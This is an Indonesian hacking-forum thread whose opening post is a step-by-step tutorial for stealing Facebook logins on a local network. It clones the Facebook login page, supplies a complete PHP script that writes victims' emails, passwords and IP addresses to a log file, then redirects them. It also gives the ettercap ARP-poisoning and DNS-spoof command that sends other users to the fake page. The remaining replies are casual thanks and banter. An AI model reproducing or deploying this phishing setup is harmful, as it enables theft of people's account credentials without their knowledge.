[Share] ettercap dns_spoof (fake login) #PART 2
#1
oke om disini ane mau share tentang fake login atau phising featuring arp_spoof. mungkin cara ini udah basi banget diantara brother. tapi tujuan ane cuma untuk berbagi tidak lebih .
untuk lebih jelas nya baca dulu #PART 1 nya om di mari http://indonesianbacktrack.or.id/forum/thread-697.html

oke deh langsung aja, disini ane mau menggunakan fake login facebook.

1. buka http://www.facebook.com
2. save page as dah, tapi disimpennya di "/var/www" dengan nama "index.html"
3. udah di save kan tuh?? yaudah. close gih browser lu. wkwkwkwkwk. egk om becanda ane. hehe
edit file "index.html" search tulisan "action".
SS:
Spoiler! :
[Image: 1.png]
4. ubah dengan "post.php"
SS:
Spoiler! :
[Image: 2.png]
5. untuk file php "post.php" nya:
Spoiler! :

Quote:<?php

$file = "logs.txt";

$username = $_POST['email'];

$password = $_POST['pass'];

$ip = $_SERVER['REMOTE_ADDR'];

$today = date("F j, Y, g:i a");



$handle = fopen($file, 'a');

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "Email: ");

fwrite($handle, "$username");

fwrite($handle, "\n");

fwrite($handle, "Password: ");

fwrite($handle, "$password");

fwrite($handle, "\n");

fwrite($handle, "IP Address: ");

fwrite($handle, "$ip");

fwrite($handle, "\n");

fwrite($handle, "Date Submitted: ");

fwrite($handle, "$today");

fwrite($handle, "\n");

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "\n");

fclose($handle);

echo "<script LANGUAGE=\"JavaScript\">

<!--

window.location=\"https://login.facebook.com/login.php?login_attempt=1\";

// -->

</script>";

?>

jangan lupa tetep ditaro di "/var/www"
6. edit "post.php"
SS:
Spoiler! :
[Image: 3.png]
7. edit "etter.dns" di directory "/usr/local/share/ettercap/"
SS:
Spoiler! :
[Image: 4.png]
8. jalankan deh:
#ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
ane pake interfaces wlan0
9. testing di browser client lain:
SS:
Spoiler! :
[Image: 5.jpg]
10. muncul pesan dulu Big Grin :
SS:
Spoiler! :
[Image: 6.jpg]
11. terus page dialihin ke gagal login:
SS:
Spoiler! :
[Image: 7.jpg]
12. sekarang tinggal liat hasil deh Big Grin :
SS:
Spoiler! :
[Image: 8.png]

finish.
maaf ya om, pengguna baru aja bikin tread panjang2 gini. hehe

ket: agar file yang di "/var/www" bisa diakses jangan lupa untuk mengaktifkan apache.
#/etc/init.d/apache2 start
[shcode=This_site_xss-ed]

#2
nice shere om

terus berbagi Big Grin

#3
kucrut om, bukan kocrot.
waduuhhhh Tongue
[shcode=This_site_xss-ed]

#4
wkwkwk
[shcode=This_site_xss-ed]

#5
oleh2 apa w aja gk mudik2an Tongue
[shcode=This_site_xss-ed]

#6
oke ane bawain kredok Big Grin
[shcode=This_site_xss-ed]

#7
Oke bro tengkyu Smile
root@IBTeam# loe.gw ^C

#8
Hus hus... kog malah ngobrol di thread?
ati2....

Nice om udah share, nanti ane coba

bookmarked Big Grin
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#9
krenz crut...
om jemes juga dah pernah bahas ini tapi ane slalu gatot tuh
Big Grin
nice share crut

#10
(08-29-2011, 08:43 PM)THJC Wrote: Hus hus... kog malah ngobrol di thread?
ati2....

Nice om udah share, nanti ane coba

bookmarked Big Grin

mantap baru x ini share an ane di bookmarked ama momod Big Grin
[shcode=This_site_xss-ed]






Users browsing this thread: 1 Guest(s)